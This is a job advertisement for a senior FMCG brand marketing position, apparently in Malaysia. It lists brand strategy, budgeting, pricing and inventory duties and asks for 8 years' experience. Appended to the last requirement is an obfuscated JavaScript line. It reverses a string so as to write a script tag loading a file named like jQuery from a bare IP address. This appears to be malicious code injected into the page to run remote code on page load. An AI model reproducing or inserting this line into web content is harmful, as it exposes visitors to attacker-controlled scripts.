Industry : FMCG
– Set the creative direction for the brand and all aspects of the advertising production process.
– Conceptualize and develop brand and product strategic marketing plan. Develops yearly marketing and brand development plan.
– Responsible for planning and implementing the marketing plans, programs, operations and activities according to stipulated timeline – ensuring quality brand, product, promotion, advertising, event and public relationship management.
– Manage brand profit and loss budget to deliver profit and sales targets.
– Develop effective pricing strategy and understands the impact of pricing and costing of profit and loss.
– Responsible to analyse, forecast and project monthly production/ordering volume and ensure the right level of inventory (stocks) to prevent out of stocks situation
– Analyse competitor’s strategy and to plan necessary steps in managing competition.
– Identify and assess the potential of new product development together with immediate superior and lead in the development of new product.
– Have understanding of current consumer needs, market place trends, market research, packaging, advertising, media, key business challenges, business drivers, technology/science behind development of products.
– Communicate effectively with individuals at all levels of the organisation
– Manage multiple ask in a past paced and ever changing environment
– Perform other related duties as assigned from time to time.
– Degree in Marketing/Business or equivalent
– Minimum 8 years of working experience in FMCG brand marketing position
– Good communication and interpersonal skills
– Proficiency in spoken and written English and Bahasa Malaysia
– Result oriented, resourceful, independent, dynamic
– Possess strong presentation, planning, organising and analytical skills document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))